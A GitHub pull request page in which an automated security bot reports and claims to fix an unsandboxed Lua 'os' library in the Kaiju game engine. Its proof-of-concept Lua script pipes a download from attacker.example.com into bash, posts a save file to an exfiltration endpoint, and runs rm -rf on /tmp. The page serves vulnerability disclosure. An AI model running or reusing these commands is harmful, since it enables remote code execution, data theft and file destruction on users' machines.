kaiju icon indicating copy to clipboard operation
kaiju copied to clipboard
Published 2 months ago verified publisher icon KaijuEngine

[Security] Fix CRITICAL vulnerability: V-001

Open orbisai0security opened this issue 2 months ago • 0 comments

Security Fix

This PR addresses a CRITICAL severity vulnerability detected by our security scanner.

Security Impact Assessment

Aspect Rating Rationale
Impact Critical In the Kaiju game engine, where Lua scripts are used for game logic and potentially user-modded content, exploitation could allow arbitrary command execution on the host system, leading to complete compromise of the player's machine, including data theft or malware installation. The lack of sandboxing means any loaded script, even if intended for game mechanics, could escalate to full RCE without restrictions.
Likelihood Medium As a game engine repository, Kaiju is likely used by developers to build games that may incorporate user-provided scripts or mods, increasing the attack surface if scripts are loaded from untrusted sources. However, exploitation requires an attacker to craft and inject a malicious Lua script into the game environment, which is not trivial without access to the game's script loading mechanisms.
Ease of Fix Medium Remediation involves modifying the Lua initialization in lua_script.go to selectively load libraries, excluding 'os', and potentially implementing a custom sandbox or whitelist for allowed functions. This requires code refactoring across the scripting plugin, thorough testing to ensure game functionality remains intact, and possible updates to dependencies if a Lua sandbox library is integrated.

Evidence: Proof-of-Concept Exploitation Demo

⚠️ For Educational/Security Awareness Only

This demonstration shows how the vulnerability could be exploited to help you understand its severity and prioritize remediation.

How This Vulnerability Can Be Exploited

The Lua scripting plugin in the Kaiju engine initializes the Lua state with all standard libraries, including the 'os' library, via the L.OpenLibs() call in src/plugins/lua/lua_script.go. This allows loaded Lua scripts to execute arbitrary system commands without restriction, enabling an attacker to inject or modify a script in a game project using Kaiju to achieve remote code execution on the host system. In a real-world scenario, this could occur through compromised game assets, malicious mods, or supply chain attacks on the engine itself.

The Lua scripting plugin in the Kaiju engine initializes the Lua state with all standard libraries, including the 'os' library, via the L.OpenLibs() call in src/plugins/lua/lua_script.go. This allows loaded Lua scripts to execute arbitrary system commands without restriction, enabling an attacker to inject or modify a script in a game project using Kaiju to achieve remote code execution on the host system. In a real-world scenario, this could occur through compromised game assets, malicious mods, or supply chain attacks on the engine itself.

-- Malicious Lua script (e.g., named exploit.lua) that could be injected into a Kaiju game project
-- This script uses the unsandboxed 'os' library to execute arbitrary commands
-- In Kaiju, scripts are typically loaded from project assets (e.g., via the scripting system in src/plugins/lua/)

-- Example: Execute a command to download and run a reverse shell
os.execute("curl -s http://attacker.example.com/reverse_shell.sh | bash")

-- Alternative: Exfiltrate sensitive data, like user save files or system info
local file = io.open("/home/user/.kaiju_game/saves/user_data.json", "r")
if file then
    local content = file:read("*all")
    file:close()
    -- Send to attacker server
    os.execute("curl -d 'data=" .. content .. "' http://attacker.example.com/exfil")
end

-- Or: Delete critical files to cause disruption
os.execute("rm -rf /tmp/*")  -- Mild example; could target game assets or system dirs

Exploitation Impact Assessment

Impact Category Severity Description
Data Exposure Medium Access to user-specific game data (e.g., save files, configurations in ~/.kaiju_game/ or similar directories), potentially including personal info like usernames or in-game achievements. No direct access to sensitive system data like passwords, but scripts could exfiltrate local files if paths are known.
System Compromise High Full arbitrary code execution on the host system via os.execute, allowing installation of malware, keyloggers, or backdoors. Attacker gains user-level privileges (or higher if the game runs elevated), enabling persistence across reboots or lateral movement.
Operational Impact High Scripts could delete game assets or system files, causing game crashes, data loss, or host instability (e.g., resource exhaustion from spawned processes). In multiplayer games, could disrupt servers if Kaiju is used server-side, leading to downtime.
Compliance Risk Low Primarily affects consumer software; no direct violation of enterprise standards like GDPR or HIPAA, as Kaiju is a game engine not typically handling regulated data. However, could indirectly impact OWASP Top 10 (A03:2021-Injection) if used in web-integrated games.

Vulnerability Details

  • Rule ID: V-001
  • File: src/plugins/lua/lua_script.go
  • Description: The Lua scripting engine is initialized with all standard libraries, including the dangerous 'os' library, without any sandboxing. The function L.OpenLibs() loads libraries that allow file system access and command execution. A malicious script loaded by the application can execute arbitrary commands on the host system.

Changes Made

This automated fix addresses the vulnerability by applying security best practices.

Files Modified

  • src/plugins/lua/lua_script.go

Verification

This fix has been automatically verified through:

  • ✅ Build verification
  • ✅ Scanner re-scan
  • ✅ LLM code review

🤖 This PR was automatically generated.

orbisai0security avatar Dec 10 '25 08:12 orbisai0security